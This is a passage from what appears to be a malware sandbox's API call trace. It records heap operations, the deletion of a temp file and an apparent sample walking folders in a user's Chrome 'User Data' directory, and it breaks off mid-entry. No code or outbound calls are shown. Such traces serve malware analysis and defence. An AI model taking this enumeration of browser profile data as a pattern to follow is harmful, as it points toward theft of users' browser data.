hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929f28) returned 0x50 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929f28 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0x10 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a798 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b988) returned 0x22 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b988 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a840 | out: hHeap=0x2dc0000) returned 1 [0163.780] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929a00) returned 0x42 [0163.780] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929a00 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39299b0) returned 0x43 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39299b0 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394b938) returned 0x43 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394b938 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a858 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a870 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a888 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a6c0) returned 0x54 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a6c0 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x1d4c0 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392bf70 | out: hHeap=0x2dc0000) returned 1 [0163.781] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x1d8 [0163.781] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0163.781] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7219.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7219.tmp")) returned 1 [0163.781] VirtualQuery (in: lpAddress=0x925430, lpBuffer=0x2df52c, dwLength=0x1c | out: lpBuffer=0x2df52c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.781] GetProcessHeap () returned 0x8e0000 [0163.781] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925430 | out: hHeap=0x8e0000) returned 1 [0163.781] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.781] GetProcessHeap () returned 0x8e0000 [0163.781] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.781] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0163.781] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0163.782] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0163.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.782] lstrlenW (lpString="\\") returned 1 [0163.782] GetProcessHeap () returned 0x8e0000 [0163.782] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.782] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.782] lstrlenW (lpString="SSLErrorAssistant") returned 17 [0163.782] GetProcessHeap () returned 0x8e0000 [0163.782] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925360 [0163.782] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0163.782] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.782] GetProcessHeap () returned 0x8e0000 [0163.782] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 85 [0163.782] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 85 [0163.782] lstrlenW (lpString="\\*.*") returned 4 [0163.782] GetProcessHeap () returned 0x8e0000 [0163.782] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925418 [0163.782] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0163.782] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*" [0163.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.782] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.782] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.783] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.783] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.783] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0163.783] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0163.783] VirtualQuery (in: lpAddress=0x925418, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.783] GetProcessHeap () returned 0x8e0000 [0163.783] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925418 | out: hHeap=0x8e0000) returned 1 [0163.783] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.783] GetProcessHeap () returned 0x8e0000 [0163.783] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.783] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0163.783] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0163.783] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0163.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.783] lstrlenW (lpString="\\") returned 1 [0163.783] GetProcessHeap () returned 0x8e0000 [0163.783] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.783] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.783] lstrlenW (lpString="SwReporter") returned 10 [0163.783] GetProcessHeap () returned 0x8e0000 [0163.783] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9e) returned 0x925360 [0163.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.783] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0163.783] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.783] GetProcessHeap () returned 0x8e0000 [0163.784] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 78 [0163.784] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 78 [0163.784] lstrlenW (lpString="\\*.*") returned 4 [0163.784] GetProcessHeap () returned 0x8e0000 [0163.784] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x925408 [0163.784] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0163.784] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*" [0163.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.784] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.784] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.784] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.784] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.784] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0163.784] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0163.784] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.784] GetProcessHeap () returned 0x8e0000 [0163.784] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0163.784] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.785] GetProcessHeap () returned 0x8e0000 [0163.785] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0163.785] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0163.785] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0163.785] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0163.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0163.785] lstrlenW (lpString="\\") returned 1 [0163.785] GetProcessHeap () returned 0x8e0000 [0163.785] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0163.785] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0163.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0163.785] lstrlenW (lpString="WidevineCdm") returned 11 [0163.785] GetProcessHeap () returned 0x8e0000 [0163.785] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0163.785] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0163.785] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0163.785] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.785] GetProcessHeap () returned 0x8e0000 [0163.785] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 79 [0163.785] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 79 [0163.785] lstrlenW (lpString="\\*.*") returned 4 [0163.785] GetProcessHeap () returned 0x8e0000 [0163.785] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925408 [0163.786] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0163.786] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*" [0163.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0163.786] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.786] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.786] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.786] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.786] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0163.786] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0163.786] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.786] GetProcessHeap () returned 0x8e0000 [0163.786] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0163.786] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.786] GetProcessHeap () returned 0x8e0000 [0163.786] HeapFree (in: hHeap=0x8e0000, 